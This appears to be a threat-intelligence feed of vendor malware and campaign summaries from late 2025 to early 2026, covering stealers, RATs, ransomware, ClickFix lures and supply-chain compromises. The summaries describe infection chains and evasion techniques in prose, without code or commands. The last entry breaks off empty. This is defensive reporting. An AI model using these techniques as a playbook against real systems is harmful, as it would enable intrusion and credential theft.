- Intel Source:
- Cyderes
- Intel Name:
- A_Deployment_of_CountLoader_and_ACR_Stealer
- Date of Scan:
- 2026-01-05
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyderes have uncovered an active malware campaign that leverages cracked-software distribution sites to deliver a malicious loader known as CountLoader (v3.2), which ultimately installs the ACR Stealer. The attack begins when a victim downloads a malicious archive containing a trojanized Python library and a decoy document that provides the password for an embedded ZIP file. When executed, the malicious component uses MSHTA to download and run an obfuscated CountLoader stage. The loader profiles the infected system, establishes persistence through scheduled tasks, and communicates with its C2 infrastructure using custom encoding. After confirming an active C2 server, it retrieves additional instructions and deploys the ACR Stealer payload directly in memory, enabling the theft of credentials and other sensitive data.
EtherRAT_Abuses_Ethereum_for_Fileless_C2
HIGH
+
—
- Intel Source:
- Sysdig
- Intel Name:
- EtherRAT_Abuses_Ethereum_for_Fileless_C2
- Date of Scan:
- 2026-01-01
- Impact:
- HIGH
- Summary:
- Researchers at the Sysdig have identified EtherRAT, a newly observed remote access trojan that abuses the Ethereum blockchain for command and control and is delivered through exploitation of the React2Shell vulnerability in Next.js applications, with the malware operating in a fileless manner via Node.js to execute fully in memory and evade disk-based detection, while using smart contract state changes to dynamically resolve active infrastructure for resilient C2 operations; analysis uncovered five post-compromise modules including system reconnaissance that self-terminates on CIS-region locales, credential and cryptocurrency theft targeting wallet seed phrases, API keys, and cloud credentials, a self-propagating worm that scans and exploits additional vulnerable endpoints across internal and external networks, a web server hijacking component used for traffic redirection and monetization, and an SSH-based persistence mechanism using a hard-coded public key, and although initial assessment suggested a possible DPRK nexus, characteristics such as CIS locale exclusion and monetization-focused behavior align more closely with Russian-speaking threat actor tradecraft, indicating either shared tooling or deliberate false flagging.
BlindEagle_Colombian_Gov_Spearphish_Uses_DCRAT
HIGH
+
—
- Intel Source:
- Zscaler Threatlabz
- Intel Name:
- BlindEagle_Colombian_Gov_Spearphish_Uses_DCRAT
- Date of Scan:
- 2025-12-31
- Impact:
- HIGH
- Summary:
- Researchers at Zscaler ThreatLabz have identified a spear-phishing campaign attributed to the South American threat actor BlindEagle, targeting a Colombian government agency under the Ministry of Commerce, Industry and Tourism (MCIT). The campaign leveraged a compromised internal email account to distribute phishing messages containing an SVG attachment that redirected victims to a fraudulent judicial web portal. From there, victims were deceived into downloading a JavaScript file that initiated a file-less infection chain. This chain executed multiple obfuscated JavaScript stages and PowerShell commands to deploy the Caminho downloader, which ultimately delivered the DCRAT remote access trojan. The attack demonstrated multi-layered obfuscation, in-memory execution, and the use of legitimate services such as Discord for payload hosting. Caminho’s code contained Portuguese elements, suggesting origins within the Brazilian cybercriminal ecosystem.
EmEditor_Compromise_Info_Stealing_Supply_Chain_Attack
HIGH
+
—
- Intel Source:
- Qianxin Threat Intelligence Center
- Intel Name:
- EmEditor_Compromise_Info_Stealing_Supply_Chain_Attack
- Date of Scan:
- 2025-12-31
- Impact:
- HIGH
- Summary:
- Researchers at Qianxin Threat Intelligence Center have identified a significant software supply chain compromise impacting the official EmEditor installation packages between December 19 and 22, 2025. The attackers replaced legitimate MSI installers with malicious ones signed by a fake certificate, embedding a PowerShell-based information-stealing payload. Once executed, the malware harvested extensive system and credential data, including operating system details, browser information, VPN configurations, and user credentials across communication and productivity tools. It employed RSA encryption for stolen data and achieved persistence through a malicious Microsoft Edge extension masquerading as a legitimate cloud storage plugin.
Silver_Fox_India_Tax_Phishing_Valley_RAT
HIGH
+
—
- Intel Source:
- Cloudsek
- Intel Name:
- Silver_Fox_India_Tax_Phishing_Valley_RAT
- Date of Scan:
- 2025-12-30
- Impact:
- HIGH
- Summary:
- CloudSEK reports a targeted phishing campaign attributed to the Chinese Silver Fox APT abusing India Income Tax–themed lures to gain initial access . Rather than deploying an overtly malicious executable, the operation relies on a convincing PDF decoy that redirects victims to download an installer masquerading as legitimate tax-related content. Once launched, the installer abuses a signed third-party binary to sideload a malicious DLL, allowing execution to blend into normal Windows activity. The loader performs anti-debugging and sandbox checks before decrypting and executing payloads entirely in memory. The infection chain culminates in the deployment of Valley RAT, a modular backdoor designed for long-term, low-noise persistence. Valley RAT uses delayed beaconing, protocol switching, and three-tier command-and-control failover to evade detection and blocking. Registry-based storage enables operators to update C2 infrastructure and deploy new plugins without redeploying malware. The campaign’s victimology, infrastructure, and tooling contradict earlier attribution to India-aligned actors and instead align with known Silver Fox tradecraft. The impact is sustained access with capabilities for credential theft, surveillance, and lateral movement.
Russian_Espionage_Campaign_Abuses_Viber_Messages
HIGH
+
—
- Intel Source:
- 360 Threat Intelligence Center
- Intel Name:
- Russian_Espionage_Campaign_Abuses_Viber_Messages
- Date of Scan:
- 2025-12-29
- Impact:
- HIGH
- Summary:
- Researchers at the 360 Threat Intelligence Center have observed that UAC-0184, also known as Hive0156, is a Russian state-aligned cyber-espionage group targeting Ukrainian military and government entities through a campaign dubbed "The Dark Side of the Fallen Files," which leverages the Viber messaging platform to deliver malicious ZIP archives containing shortcut files and PowerShell scripts disguised as official Ukrainian parliament correspondence and themed around sensitive military and administrative topics to socially engineer recipients. Once executed, the infection chain retrieves secondary payloads, including HijackLoader, which ultimately deploys the Remcos remote access trojan through a multi-stage process involving DLL side-loading, module stomping, unconventional control flow, and dynamic shellcode decryption to evade detection. HijackLoader performs security product reconnaissance, disables built-in protections, establishes persistence via scheduled tasks, and obscures execution.
DNS_Poisoning_Delivers_MgBot
MEDIUM
+
—
- Intel Source:
- Securelist
- Intel Name:
- DNS_Poisoning_Delivers_MgBot
- Date of Scan:
- 2025-12-29
- Impact:
- MEDIUM
- Summary:
- Researchers at Securelist have uncovered a highly targeted campaign by the Evasive Panda threat group, also known as Bronze Highland, Daggerfly, or StormBamboo, that quietly delivers malware by manipulating DNS responses. The campaign relies on victim-specific delivery, with each infection carefully tailored to reduce detection and complicate analysis. The attack impersonates legitimate software updates for widely used applications, allowing it to blend seamlessly into normal user activity. Malware is delivered in multiple stages and proceeds only when specific conditions are met, helping it evade automated defenses. Its components are encrypted, bound to the infected system, and often executed directly in memory or injected into trusted processes to remain hidden. The final payload identified is MgBot, highlighting the group’s focus on long-term remote access and persistent control rather than immediate disruption.
A_Deployment_of_CoinMiner_Payloads
MEDIUM
+
—
- Intel Source:
- Asec
- Intel Name:
- A_Deployment_of_CoinMiner_Payloads
- Date of Scan:
- 2025-12-28
- Impact:
- MEDIUM
- Summary:
- Researchers at ASEC have uncovered multiple campaigns that exploit a GeoServer remote code execution vulnerability (CVE-2024-36401) to install cryptocurrency miners on exposed servers. The attackers scan the internet for vulnerable GeoServer deployments rather than targeting specific organizations. Once access is gained, the attackers deploy XMRig-based CoinMiner payloads to hijack system resources for cryptomining. In some cases, they use multi-stage PowerShell and Bash scripts, including droppers delivered via certutil and downloaders that can run payloads directly in memory. The attackers also try to weaken host defenses by adding Windows Defender exclusions and disabling security settings to keep their access longer.
npm_Spearphishing_Document_Lures_AiTM
HIGH
+
—
- Intel Source:
- Socket
- Intel Name:
- npm_Spearphishing_Document_Lures_AiTM
- Date of Scan:
- 2025-12-28
- Impact:
- HIGH
- Summary:
- Researchers from the Socket Threat Research Team uncovered a sustained spearphishing campaign that abuses the npm registry as durable hosting for browser-based phishing lures . Instead of compromising developers through malicious dependencies, the actor repurposes npm packages as web-delivered phishing components that execute directly in the victim’s browser. The operation ran for at least five months and involved 27 malicious packages published under multiple aliases. These packages impersonate secure document-sharing portals and Microsoft sign-in pages, with the victim’s email address prefilled to increase credibility. The campaign is highly targeted, focusing on sales and commercial staff at manufacturing, industrial automation, plastics, and healthcare organizations. Once the lure is opened, client-side JavaScript replaces page content and guides the victim through a staged verification flow. Lightweight anti-analysis controls, including bot detection, honeypot form fields, and interaction gating, are used to evade scanners. Credential submission redirects victims to threat actor-controlled infrastructure associated with adversary-in-the-middle techniques. In some cases, the infrastructure overlaps with Evilginx-style patterns capable of stealing session cookies and bypassing MFA. The impact is credential compromise with potential downstream account takeover rather than endpoint malware infection
Tax_Themed_Phish_NSIS_RAT_Fake_ITD
HIGH
+
—
- Intel Source:
- Seqrite
- Intel Name:
- Tax_Themed_Phish_NSIS_RAT_Fake_ITD
- Date of Scan:
- 2025-12-27
- Impact:
- HIGH
- Summary:
- Researchers from Seqrite have uncovered a tax-themed phishing campaign targeting Indian businesses that impersonates the Indian Income Tax Department to deliver a remote access malware payload. The attack begins with spearphishing emails using urgent compliance lures that direct victims to a fraudulent tax portal hosting a malicious ZIP archive. When executed, the archive launches a multi-stage NSIS installer chain that drops and executes a hidden RAT component while attempting to weaken local security controls. The malware establishes persistence by registering a Windows service disguised as a legitimate system protection service. It then performs system reconnaissance, collects host and software information, and registers the infected device with attacker-controlled infrastructure. The implant communicates with its command-and-control servers over multiple ports, enabling remote command execution and follow-on activity. The campaign emphasizes persistence and operational control, posing significant risk to affected organizations through sustained endpoint compromise
Webrat_GitHub_Exploit_Lure_Backdoor
MEDIUM
+
—
- Intel Source:
- Securelist
- Intel Name:
- Webrat_GitHub_Exploit_Lure_Backdoor
- Date of Scan:
- 2025-12-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Securelist have uncovered a Webrat campaign that shifts distribution from game cheats and cracked software to fake exploits hosted on GitHub repositories . Instead of targeting casual users, the attackers now focus on students and inexperienced security professionals by disguising malware as proof-of-concept exploits for high-profile vulnerabilities. The repositories are carefully crafted with AI-generated vulnerability descriptions and realistic mitigation guidance to appear legitimate. Victims are lured into downloading password-protected archives that contain a decoy file alongside a malicious loader. Once executed, the loader escalates privileges, disables Windows Defender, and retrieves the Webrat backdoor from a remote server. The end goal is persistent system access and data theft, including credentials, messaging accounts, and surveillance via keylogging and media capture
Phantom_Shuttle_Malicious_Chrome_VPN
HIGH
+
—
- Intel Source:
- Socket
- Intel Name:
- Phantom_Shuttle_Malicious_Chrome_VPN
- Date of Scan:
- 2025-12-26
- Impact:
- HIGH
- Summary:
- Researchers from Socket have uncovered a long-running malicious Chrome extension campaign tracked as Phantom Shuttle that masquerades as a legitimate VPN and network testing tool. The activity targets developers and foreign trade workers through professionally branded Chrome Web Store listings and a paid subscription model that builds trust and reduces suspicion. The extensions abuse Chrome proxy and authentication APIs to silently inject hardcoded credentials, placing victims in an adversary-in-the-middle position and routing traffic through attacker-controlled infrastructure. The report details how the extensions continuously exfiltrate user emails and passwords via periodic heartbeat communications while selectively proxying high-value domains such as cloud services and developer platforms. This operation has remained active since at least 2017, posing significant credential theft and downstream enterprise and supply-chain risk.
EtherRAT_React2Shell_Exploit_Distribution
HIGH
+
—
- Intel Source:
- AhnLab SEcurity intelligence Center
- Intel Name:
- EtherRAT_React2Shell_Exploit_Distribution
- Date of Scan:
- 2025-12-26
- Impact:
- HIGH
- Summary:
- ASEC reports an active campaign exploiting the React2Shell vulnerability (CVE-2025-55182) to deploy EtherRAT via automated scanning of exposed React/Next.js servers. The multi-stage Node.js infection chain installs a RAT capable of command execution, credential and cryptocurrency theft, SSH key persistence, and propagation. EtherRAT uniquely resolves its C2 through Ethereum smart contract queries, indicating higher operational sophistication. The activity is opportunistic and high impact, enabling persistent access and financial theft
Repeated_IIS_Intrusions_Lead_to_Malware_Access
LOW
+
—
- Intel Source:
- Huntress
- Intel Name:
- Repeated_IIS_Intrusions_Lead_to_Malware_Access
- Date of Scan:
- 2025-12-25
- Impact:
- LOW
- Summary:
- Researchers from Huntress have uncovered three intrusions in which a threat actor repeatedly failed and retried actions until malware execution and persistence partially succeeded. In each case, the activity originated from Microsoft IIS web servers, with commands executed under the IIS worker process. The actor relied on basic but effective techniques, including system enumeration, downloading and launching files using built-in Windows utilities, and repeatedly attempting to run the same payloads after initial failures. In later stages, they attempted to weaken defenses by adding Microsoft Defender exclusions and attempted to establish persistence by creating a Windows service, although some efforts failed due to misconfiguration. The affected victims included a development firm, a manufacturing organization, and an enterprise shared services provider, indicating broad and opportunistic targeting rather than a focus on a specific industry.
Shared_Lazarus_Kimsuky_Attack_Infrastructure
HIGH
+
—
- Intel Source:
- Hunt.IO
- Intel Name:
- Shared_Lazarus_Kimsuky_Attack_Infrastructure
- Date of Scan:
- 2025-12-25
- Impact:
- HIGH
- Summary:
- Researchers from Hunt.io and Acronis Threat Research identified a campaign linked to the North Korea–aligned groups Lazarus and Kimsuky by analysing how their infrastructure is reused across operations, rather than focusing on a single malware. The report shows that the same servers, certificates, ports, and hosting choices appear again and again, revealing consistent operator behavior. The researchers also uncovered open directories exposing credential-stealing tools, repeated use of tunneling and proxy services, and infrastructure that supports remote access and command-and-control activity. The analysis links the Lazarus group to a Linux backdoor called Badcall and its supporting hosting environment, while another highlight open directories filled with mixed toolsets for credential theft, data exfiltration, and remote administration. Overall, the activity suggests the actors can quickly scale and redeploy proxy nodes across multiple VPS providers with minimal effort.
MacSync_Stealer
MEDIUM
+
—
- Intel Source:
- Jamf
- Intel Name:
- MacSync_Stealer
- Date of Scan:
- 2025-12-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Jamf Threat Labs have uncovered a MacSync Stealer campaign that marks a shift from earlier user-driven infection methods to a quieter, more automated approach on macOS. Instead of relying on ClickFix tricks or forcing users to paste commands into Terminal, the attackers now distribute a code-signed and notarized Swift application inside a disk image that looks legitimate and includes decoy content to appear trustworthy. Once launched, the app silently fetches an encoded script from a remote server and runs it using a built-in helper, with no further user interaction. The malware checks its environment and internet connectivity before proceeding, limits how often it can run, and lightly validates downloaded content to avoid errors and reduce suspicion. By minimizing warnings and user prompts, the campaign supports stealthy execution, with the end goal of infostealer activity such as stealing credentials and sensitive data from macOS systems.
ConsentFix_A_New_Phishing_Attack_Technique
MEDIUM
+
—
- Intel Source:
- Push Security
- Intel Name:
- ConsentFix_A_New_Phishing_Attack_Technique
- Date of Scan:
- 2025-12-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Push Security have identified ConsentFix, a browser-native phishing technique that abuses OAuth consent flows combined with ClickFix-style user interaction to compromise Microsoft cloud accounts without requiring passwords or MFA prompts. Victims are lured via search results to compromised or malicious websites that masquerade as routine security checks and guide users to complete a legitimate Microsoft sign-in in a separate tab. By tricking users into copying authorization data from the browser address bar back into the lure page, attackers can redeem OAuth tokens using Azure command-line tooling. This enables control over the victim’s Microsoft identity and associated resources while relying solely on standard cloud application workflows. The attack operates entirely within the browser, evades many endpoint and email-based defenses, and uses selective targeting and anti-analysis measures to reduce detection.
Ink_Dragon_Espionage_Campaign
HIGH
+
—
- Intel Source:
- CheckPoint
- Intel Name:
- Ink_Dragon_Espionage_Campaign
- Date of Scan:
- 2025-12-24
- Impact:
- HIGH
- Summary:
- Check Point researchers have identified an espionage campaign conducted by the PRC-aligned threat actor Ink Dragon, also tracked as CL-STA-0049, Earth Alux, and REF7707. The group primarily targets government, telecommunications, and other public-sector organizations across Southeast Asia, South America, Africa, and Europe. Initial access is typically achieved by exploiting ASP.NET ViewState deserialization vulnerabilities on exposed IIS and SharePoint servers, as well as the SharePoint ToolShell vulnerability, enabling remote code execution without user interaction. After gaining access, the actors rapidly escalate privileges, harvest credentials and authentication tokens, and pivot laterally by abusing administrative RDP sessions. They deploy ShadowPad and FinalDraft malware to establish C2, move laterally across Windows environments, and exfiltrate sensitive data. Throughout the campaign, Ink Dragon consistently abuses legitimate digital signatures and disguises malicious binaries as native Windows components to evade detection and blend into normal system activity.
Targeted_Email_Campaigns
MEDIUM
+
—
- Intel Source:
- Cyble
- Intel Name:
- Targeted_Email_Campaigns
- Date of Scan:
- 2025-12-23
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble have uncovered a targeted email campaign that uses a multi-stage loader to deliver malware, including remote access trojans and information stealers. The attack begins with spear-phishing emails disguised as purchase order communications, in which malicious attachments trigger scripts that download and execute additional components. To evade detection, the loader employs heavy obfuscation, execution delays, and in-memory loading to minimize forensic artifacts on the system. The campaign also conceals malicious code within image files using steganography and weaponizes legitimate open-source libraries by appending malicious code while keeping their expected functionality. The final payload injects itself into a trusted Windows process to blend in with legitimate activity and focuses on stealing credentials and sensitive data. Overall, the campaign primarily targets industrial organizations, with the goal of harvesting sensitive information and credentials for further compromise.
SantaStealer_Emerging_Infostealer_Malware
MEDIUM
+
—
- Intel Source:
- Rapid7 Labs
- Intel Name:
- SantaStealer_Emerging_Infostealer_Malware
- Date of Scan:
- 2025-12-23
- Impact:
- MEDIUM
- Summary:
- Researchers at Rapid7 Labs have identified SantaStealer, a newly emerging infostealer malware being actively marketed on underground forums and Telegram channels as part of a growing infostealer-as-a-service ecosystem. The malware is currently under development and offered in subscription-based tiers that advertise advanced anti-analysis and stealth features, although technical examination suggests these claims are not yet fully realized. SantaStealer is designed to collect credentials, browser data, crypto wallet information, and system artifacts from Windows environments, employing techniques such as reflective DLL loading, in-memory execution, and the ChaCha20 encryption algorithm to obfuscate its activity. The stealer’s modular framework and web-based control panel allow operators to customize payloads, manage infected hosts, and test files for antivirus detection. Uniquely, SantaStealer provides an option to exclude victims in the Commonwealth of Independent States (CIS), indicating targeting preferences consistent with actors from Russian-speaking regions. The malware’s use of a web panel hosted under a .su domain, coupled with its rapid feature development and commercialization, points to an organized criminal operation seeking to capture market share within the commodity infostealer landscape.
LongNosedGoblin_Targets_Asian_Governments
HIGH
+
—
- Intel Source:
- ESET
- Intel Name:
- LongNosedGoblin_Targets_Asian_Governments
- Date of Scan:
- 2025-12-22
- Impact:
- HIGH
- Summary:
- Researchers at ESET identified a previously undocumented, China-aligned advanced persistent threat group named LongNosedGoblin, active since at least September 2023 and focused on cyberespionage against government institutions in Southeast Asia and Japan. The group seeks to exfiltrate sensitive information through sustained campaigns, with a distinctive tactic of abusing Windows Group Policy to enable lateral movement and large-scale malware deployment across compromised environments. Its toolkit consists mainly of custom C# and .NET malware, including components for browser history collection, multi-stage backdoor access, credential and data theft via cloud platforms, PowerShell-based payload delivery, and encrypted keystroke logging, supported by advanced execution methods such as AppDomainManager injection and AMSI bypass for evasion. Investigations also revealed the use of living-off-the-land binaries and execution guardrails to restrict activity to intended victims, along with indications of possible tool sharing with other China-aligned groups, despite clear differences in tactics and techniques. Activity observed again in September 2025 showed continued use of similar methods and abuse of common cloud services as covert command-and-control channels, reinforcing assessments that LongNosedGoblin operates with moderate to high sophistication in support of long-term intelligence collection tied to regional government affairs.
Arkanix_Stealer_Discord_Infostealer
HIGH
+
—
- Intel Source:
- Dexpose
- Intel Name:
- Arkanix_Stealer_Discord_Infostealer
- Date of Scan:
- 2025-12-22
- Impact:
- HIGH
- Summary:
- Researchers from DeXpose have identified an actively developed infostealer campaign centered around Arkanix Stealer, which is primarily marketed and distributed through Discord and underground forums. The malware is disguised as legitimate tools, enticing users to execute the payload on Windows systems. Once launched, Arkanix bypasses core Windows security controls, including AMSI and ETW, using in-memory patching to evade detection. It employs strong anti-analysis and anti-VM checks to limit execution in sandboxed environments. The stealer then harvests a wide range of sensitive data, including browser credentials, cryptocurrency wallets, VPN accounts, Discord tokens, WiFi credentials, and system metadata. Collected data is compressed and exfiltrated to attacker-controlled infrastructure hidden behind Cloudflare, enabling scalable and stealthy credential theft operations.
Paper_Werewolf_Campaign
MEDIUM
+
—
- Intel Source:
- Intezer
- Intel Name:
- Paper_Werewolf_Campaign
- Date of Scan:
- 2025-12-21
- Impact:
- MEDIUM
- Summary:
- Researchers from Intezer have uncovered a Paper Werewolf (also known as GOFFEE) campaign that leverages malicious Excel XLL add-ins and AI-generated decoy documents to deploy a new backdoor, dubbed EchoGather. The operation relies on social engineering and user interaction, with execution techniques designed to delay activity, evade sandbox detection, and minimize visible indicators of compromise. Once established, EchoGather collects basic system and user information and maintains periodic communication with its C2 servers over encrypted web traffic. The backdoor also supports remote command execution and file exfiltration. The decoy content is crafted to resemble official Russian-language documents and invitations, and the identified victims include Russian organizations associated with defense and industrial sectors, indicating an intelligence-gathering campaign.
APT36_LNK_Based_Malware_Campaign
MEDIUM
+
—
- Intel Source:
- Cyfirma
- Intel Name:
- APT36_LNK_Based_Malware_Campaign
- Date of Scan:
- 2025-12-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyfirma have uncovered a targeted malware campaign attributed to APT36 that uses social engineering to trick users into opening a malicious Windows shortcut disguised as a PDF advisory. The attack abuses default Windows behavior that hides file extensions, making the shortcut to appear benign. When executed, it silently runs an obfuscated command that downloads and installs a remote MSI file. This MSI acts as a loader for a multi-stage infection chain, deploying a .NET-based loader along with additional malicious components. To avoid suspicion, a decoy document is displayed while the malware executes in the background. The payload establishes persistence through registry modifications, enabling it to survive system reboots, and allow C2 functionality for remote command execution. It also collects basic system information, such as installed antivirus products, and performs checks to evade virtualized or sandboxed environments.
Deployment_of_StealC_and_Qilin_Payloads_Through_Clickfix
MEDIUM
+
—
- Intel Source:
- Sophos
- Intel Name:
- Deployment_of_StealC_and_Qilin_Payloads_Through_Clickfix
- Date of Scan:
- 2025-12-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Sophos have uncovered a campaign that leverages fake “ClickFix” human-verification prompts to trick users into executing malicious script, ultimately leading to infostealer infection and ransomware deployment. The attack begins on a compromised but legitimate website that delivers a malicious script and presents a highly convincing verification workflow. When users follow the on-screen instructions, a legitimate remote access tool is installed and then abused to establish remote control of the system. From this foothold, the attackers deploy additional payloads, including the StealC V2 infostealer via DLL sideloading, followed by Qilin ransomware, , showing that the intrusion escalated from initial access to ransomware deployment. Stolen credentials were also used to access VPN devices, suggesting that the infostealer-derived access was likely sold or handed off to a Qilin affiliate.
Phantom_Information_Stealer
MEDIUM
+
—
- Intel Source:
- K7 Labs
- Intel Name:
- Phantom_Information_Stealer
- Date of Scan:
- 2025-12-19
- Impact:
- MEDIUM
- Summary:
- Researchers at K7 Labs have identified Phantom 3.5, a .NET-based information-stealing malware distributed via a trojanized “Adobe 1.17.7” installer hosted on cracked software sites. The installer initiates a PowerShell based multi-stage infection chain that decrypts and loads additional .NET components entirely in memory. A loader component, tracked as BLACKHAX, performs process injection by hijacking an Agent_Compiler executable and injecting the final stealer payload into selected processes. The malware uses RC4-encrypted payloads, in-memory .NET assembly loading, and process hollowing to detection harder. Once established, Phantom 3.5 established persistence through registry run keys and scheduled tasks and conducts environment checks to evade sandboxing and security controls. The stealer is capable of harvesting browser data, credentials, cookies, autofill and credit card information, files, desktop and browser-based wallets, clipboard contents, system information, and stored Wi-Fi passwords. It also includes keylogging functionality and can extract credentials from multiple applications, including browsers, email clients, file-transfer tools, and other local credential stores. For data exfiltration, the malware packages stolen information and transmits it via SMTP as well as alternative channels such as FTP, Discord, and Telegram.
Malicious_Domain_Parking_Ecosystem
HIGH
+
—
- Intel Source:
- Infoblox
- Intel Name:
- Malicious_Domain_Parking_Ecosystem
- Date of Scan:
- 2025-12-19
- Impact:
- HIGH
- Summary:
- Researchers at Infoblox Threat Intel have identified a widespread abuse of the domain parking and direct search advertising ecosystem, where cyber actors monetize mistyped or abandoned domains to deliver malicious content and redirect users to harmful destinations. The investigation revealed that parked and lookalike domains, traditionally considered benign, are increasingly being leveraged as part of sophisticated malvertising and traffic distribution operations. Threat actors use advanced techniques such as DNS fast flux, GeoIP-based fingerprinting, and selective redirection to evade detection and deliver payloads including information stealers, spyware, and trojans through advertising networks. These operations are supported by large domain portfolios that impersonate major brands and exploit user errors in DNS resolution or browser navigation. The malicious ecosystem involves multiple intermediaries, including advertisers and traffic brokers, who resell visitor data and redirect chains to malware delivery systems. This convergence of legitimate ad infrastructure and malicious manipulation blurs attribution and complicates mitigation.
RansomHouse_RaaS_Operation
HIGH
+
—
- Intel Source:
- Unit42
- Intel Name:
- RansomHouse_RaaS_Operation
- Date of Scan:
- 2025-12-19
- Impact:
- HIGH
- Summary:
- Researchers at Unit 42 have identified a new ransomware-as-a-service (RaaS) operation known as RansomHouse, attributed to a threat group they track as Jolly Scorpius, which primarily targets VMware ESXi environments. The group employs a double-extortion model, combining large-scale data theft with encryption and threats to leak or sell stolen data. Activity on its data-leak site indicates a growing focus on high-value organizations across healthcare, finance, transportation, and government sectors, reflecting an emphasis on victims holding sensitive and monetizable information. RansomHouse leverages a modular toolset, including MrAgent, an ESXi management and deployment utility that maintains persistent C2 access, collects host and network details, and can disable the ESXi firewall, and Mario, a hypervisor-level ransomware payload that encrypts virtualization-related files across multiple virtual machines, drops ransom notes, and reports detailed encryption statistics.
UAT_9686_Targeting_Cisco_AsyncOS_Software
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- UAT_9686_Targeting_Cisco_AsyncOS_Software
- Date of Scan:
- 2025-12-19
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos have identified an ongoing cyber-espionage campaign targeting Cisco AsyncOS appliances used by Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. The activity, tracked as UAT-9686 and assessed with moderate confidence to be linked to a China-aligned APT, has been active since at least late November 2025. After gaining initial access, the attackers deploy a custom backdoor called AquaShell, which is embedded within an existing Python-based web server file and enables unauthenticated remote command execution via crafted web requests. The campaign also employs tunneling tools to maintain persistent access to attacker-controlled infrastructure, including reverse-SSH–like functionality and generic TCP/UDP tunneling. To evade detection, the attackers use a log-cleaning utility known as AquaPurge to remove evidence of their activity from system logs.
DarkGate_ClickFix_Social_Engineering_Chain
HIGH
+
—
- Intel Source:
- Point Wild
- Intel Name:
- DarkGate_ClickFix_Social_Engineering_Chain
- Date of Scan:
- 2025-12-18
- Impact:
- HIGH
- Summary:
- Researchers at Point Wild’s Lat61 Threat Intelligence Team have identified a sophisticated infection chain leveraging a technique dubbed ClickFix to deliver the DarkGate malware. This campaign exploits human behavior rather than software vulnerabilities, deceiving users into executing PowerShell commands under the guise of troubleshooting or browser extension fixes. The attack sequence involves multilayered scripts hidden within HTML content that decode and execute PowerShell payloads, leading to the retrieval of additional components. These payloads are designed to establish remote access, deploy secondary binaries, and enable full system compromise. The operation demonstrates advanced evasion tactics, including script obfuscation, Base64 encoding, and the use of legitimate scripting frameworks to disguise malicious intent.
GhostPoster_Malware_Hiding_in_Firefox_Extensions
HIGH
+
—
- Intel Source:
- Koi Research
- Intel Name:
- GhostPoster_Malware_Hiding_in_Firefox_Extensions
- Date of Scan:
- 2025-12-18
- Impact:
- HIGH
- Summary:
- Researchers at Koi Research have uncovered GhostPoster, a coordinated malicious campaign abusing Firefox browser extensions to deliver multi-stage malware through PNG image steganography, centered on a rogue free VPN extension active since September 2025 and 16 related add-ons that together amassed over 50,000 installs, the extensions hid JavaScript payloads inside image logo files, extracting a loader at runtime that contacted external command-and-control infrastructure to fetch encrypted payloads executed in memory, enabling monetization-focused activity such as affiliate hijacking, browser security header stripping, tracking injection, CAPTCHA bypass, and hidden iframe insertion for click fraud, while evading detection through delayed activation, randomized check-ins, XOR encryption, and runtime-only execution.
ForumTroll_Academic_Phishing_Campaign
MEDIUM
+
—
- Intel Source:
- Securelist
- Intel Name:
- ForumTroll_Academic_Phishing_Campaign
- Date of Scan:
- 2025-12-18
- Impact:
- MEDIUM
- Summary:
- Researchers at Kaspersky’s Global Research and Analysis Team (GReAT) have identified a renewed cyber-espionage campaign conducted by the ForumTroll APT group, targeting political scientists and academics in Russia. The operation represents a continuation of the group’s earlier 2025 activities but with a shift from exploiting browser vulnerabilities to using highly tailored phishing emails. These emails impersonated a well-known Russian electronic library and were crafted to appear as plagiarism notifications, deceiving recipients into downloading malicious archives. Each archive contained a shortcut file that executed a PowerShell script designed to retrieve and install a secondary payload, ultimately delivering a remote access framework known as Tuoni. The attackers employed COM hijacking for persistence and relied on cloud-based content delivery infrastructure for command-and-control communication, demonstrating technical competence and operational discipline.
PyStoreRAT_Targets_OSINT_Users_via_GitHub
HIGH
+
—
- Intel Source:
- Morphisec and Hackread
- Intel Name:
- PyStoreRAT_Targets_OSINT_Users_via_GitHub
- Date of Scan:
- 2025-12-17
- Impact:
- HIGH
- Summary:
- https://hackread.com/pystorerat-rat-malware-github-osint-researchers/ Researchers at Morphisec and Hackread have identified PyStoreRAT, an AI-enabled supply chain malware that abuses GitHub to distribute trojanized open source repositories by reactivating dormant accounts and publishing realistic, AI-generated projects such as OSINT tools, DeFi bots, and GPT-related utilities, which later receive update commits that introduce a JavaScript or HTA backdoor; PyStoreRAT operates as a flexible loader capable of system profiling, payload delivery, adaptive execution based on the presence of endpoint security products, self-propagation via removable media, and modular expansion through externally delivered updates, while its use of a rotating command-and-control architecture provides persistence and redundancy across environments, with Russian-language strings in the code suggesting mixed targeting, and overall the campaign reflects an evolution in AI-assisted social engineering that exploits trust in open source ecosystems.
UDPGangster_Backdoor
MEDIUM
+
—
- Intel Source:
- Polyswarm
- Intel Name:
- UDPGangster_Backdoor
- Date of Scan:
- 2025-12-17
- Impact:
- MEDIUM
- Summary:
- Researchers at PolySwarm have identified UDPGangster, a UDP-based backdoor linked to the Iranian state-aligned MuddyWater threat actor, actively used in targeted phishing campaigns against users in Turkey, Israel, and Azerbaijan. The malware is delivered via phishing emails that impersonate official government entities and include macro-enabled Microsoft Word documents. When recipients enable macros, embedded VBA code silently drops and executes the payload while displaying a benign decoy image to avoid arousing suspicion. Once installed, UDPGangster provides attackers with remote access over UDP, enabling command execution, file exfiltration, and deployment of additional payloads while bypassing many traditional network defenses that primarily monitor TCP traffic. The malware also establishes persistence on the infected system and employs extensive anti-analysis and anti-sandbox techniques, including virtual machine detection, hardware and memory checks, debugger detection, and scans for analysis tools, ensuring it primarily executes on real victim environments.
Rust_Malware_Analysis_Techniques_Sample_Breakdown
LOW
+
—
- Intel Source:
- Binary Defense
- Intel Name:
- Rust_Malware_Analysis_Techniques_Sample_Breakdown
- Date of Scan:
- 2025-12-17
- Impact:
- LOW
- Summary:
